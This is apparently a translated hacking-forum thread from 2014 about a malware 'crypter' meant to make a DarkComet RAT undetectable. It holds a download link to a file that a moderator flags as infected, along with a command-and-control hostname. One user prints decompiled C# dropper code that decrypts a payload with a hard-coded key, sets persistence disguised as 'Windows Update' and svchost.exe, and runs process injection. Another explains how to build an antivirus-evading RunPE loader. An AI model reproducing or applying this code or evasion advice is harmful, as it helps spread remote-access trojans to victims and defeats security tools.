Netscape, posted January 2, 2014 (edited):
Brick Crypter (obfuscate)
It's nothing special in terms of options, but it's FUD.
Download: hxxp://up.ht/KmrYlO
Scan RAT (DarkComet): Total Results: 0/35
I got it from a forum.
#Usr: the file above is infected, download it only for analysis
it's not yours, netscapedev.zapto.org
Edited January 2, 2014 by Usr6
Netscape (Author), posted January 2, 2014:
@askwrite. I wrote that I got it from a forum. It opens for me, maybe you have a virus from somewhere else.
gh551, posted January 2, 2014:
> Scan RAT (DarkComet): Total Results: 0/35
Looks colossal. If it were at least 0/36 I would definitely use it.
Netscape (Author), posted January 2, 2014:
https://www.virustotal.com/en/file/e18d720c7a22fc13f35ca06e5b8c91bba63db4da8b82d5b42b2f677a89248011/analysis/
Byte-ul, posted January 2, 2014:
This guy put the server instead of the crypter =)
Even the assembly name is "server-cryptat" ))))
https://www.virustotal.com/en/file/2ced2708be3bfe3974f089edc6e940c10ff5310da440ce7e030f670259ede54b/analysis/1388680162/
gh551, posted January 2, 2014:
What bad luck. And it was the 2014 version, too.
Netscape (Author), posted January 2, 2014:
What for, man? I got it from the VIP section on HF. It's not my fault, it opened for me. Bye now.
Byte-ul, posted January 2, 2014:
> What for, man? I got it from the VIP section on HF. It's not my fault, it opened for me. Bye now.
He says it opened for him )
How could it open for you, kid, when the code looks like this:
m0001 being the thing that decrypts
m0004 is add to startup
and m0005 is runpe.inject =)
Anyway, thanks for the RunPE, you rarely find a FUD one.
robyyxx, posted January 2, 2014:
Thanks bro, the crypter works like a charm:
when I decompiled it I got this:

    using System.Text;

    namespace _5cku0up7zblm4m6s
    {
        internal class Program
        {
            private static void Main(string[] args)
            {
                _icohsk6upujjb2br icohsk6upujjb2br = new _icohsk6upujjb2br();
                _c2kysru1o76t79dj c2kysru1o76t79dj = new _c2kysru1o76t79dj();
                _dq1y0opsmshbq9uq dq1y0opsmshbq9uq = new _dq1y0opsmshbq9uq();
                _11njsybv4w2kunao obj = new _11njsybv4w2kunao();
                // Byte array returned by an obfuscated helper
                byte[] bytes = c2kysru1o76t79dj._hp9vnnz21nl1hn26();
                // The array is transformed in place (ref) using a hard-coded ASCII key
                icohsk6upujjb2br._5bsrntzkh6p9uyd8(ref bytes, Encoding.ASCII.GetBytes("WPBmyKVH2XpVoS5TMiAtW4hv6arHDB7S"));
                // Called with a Windows-looking display name and file name
                obj._cx2tvinuqdmp9zhr("Windows Update (x86)", "svchost.exe");
                // The transformed bytes are handed to the last helper
                dq1y0opsmshbq9uq._7t5bwu0kos4h36yr(bytes);
            }
        }
    }

+ the rest of the functions and other code, I'll send it by PM to whoever wants it.
Anyway, I have to congratulate you on the effort put into making it FUD.
yes1234, posted February 7, 2014 (edited):
> He says it opened for him )
> How could it open for you, kid, when the code looks like this:
> m0001 being the thing that decrypts
> m0004 is add to startup
> and m0005 is runpe.inject =)
> Anyway, thanks for the RunPE, you rarely find a FUD one.
You can make a FUD RunPE very easily... You make a DLL with the RunPE in it, put it encrypted in the output, decrypt it at startup and invoke the method.
And I love how much effort he put into looking through the RunPE's code, "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe", I wonder what it does for those who have Windows on another partition, like me :)
Edited February 7, 2014 by yes1234
yoyois, posted February 7, 2014 (edited):
Hey, I made this crypter: https://rstforums.com/forum/63286-crypter-brick-crypter-new-version-4-37-a.rst
Anyway, it's "obfuscated" with RedGate SmartAssembly. (if you want, I have the source too)
Which scumbag is using it to spread his viruses?
Edited February 7, 2014 by yoyois